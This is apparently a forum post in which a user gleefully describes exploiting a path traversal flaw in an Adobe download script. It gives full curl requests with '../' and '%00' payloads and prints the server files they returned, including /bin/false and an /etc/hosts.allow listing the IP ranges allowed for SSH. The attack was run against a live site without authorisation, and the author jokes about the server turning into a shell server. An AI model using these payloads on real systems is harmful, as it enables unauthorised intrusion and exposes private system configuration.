I'm being slow. I opened various files with curl. So it works with more than just passwd.
This one made me smile:
sikon@lucidfox:~$ curl http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=../../../.
./../../../../..//bin/false%00
#!/usr/bin/sh
# Copyright (c) 1984, 1986, 1987, 1988, 1989 AT&T
# All Rights Reserved
# THIS IS UNPUBLISHED PROPRIETARY SOURCE CODE OF AT&T
# The copyright notice above does not evidence any
# actual or intended publication of such source code.
#ident "@(#)false.sh 1.6 93/01/11 SMI" /* SVr4.0 1.3 */
exit 255
sikon@lucidfox:~$
|-----------------------------------------------------------------|
| This system is for the use of authorized users only.            |
| Individuals using this computer system without authority, or in |
| excess of their authority, are subject to having all of their   |
| activities on this system monitored and recorded by system      |
| personnel.                                                      |
|                                                                 |
| In the course of monitoring individuals improperly using this   |
| system, or in the course of system maintenance, the activities  |
| of authorized users may also be monitored.                      |
|                                                                 |
| Anyone using this system expressly consents to such monitoring  |
| and is advised that if such monitoring reveals possible         |
| evidence of criminal activity, system personnel may provide the |
| evidence of such monitoring to law enforcement officials.       |
|-----------------------------------------------------------------|
One thing is known for certain: sooner or later someone will think to look at the sources of the scripts themselves, and eventually adobe.com will turn into a wonderful free shell server.
P.S. By the way, this hole has been making the rounds on the internet since August 26. What a bunch of clowns :)))
This one is fun too
http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=../../../.
./../../../../..//etc//hosts.allow%00
#
# Copyright (c) 2002 by Sun Microsystems, Inc.
# All rights reserved.
#
#ident "@(#)hosts.allow 1.3 05/05/27 SMI"
#
# This file is supplied as part of the Solaris Security Toolkit and
# is used to grant access to specific services as part of the Solaris 9
# TCP Wrappers implementation. This file should be customized based
# on individual site needs.
#
ALL: LOCAL
sshd: \
 130.248.0.0/255.255.0.0 \
 153.32.0.0/255.255.0.0 \
 10.0.0.0/255.0.0.0 \
 172.16.0.0/255.240.0.0 \
 192.168.0.0/255.255.0.0
It opened a couple of links, and now everything returns: "Site Area Temporarily Unavailable. We're sorry, the site area you've requested is unavailable due to scheduled maintenance. Please try again later."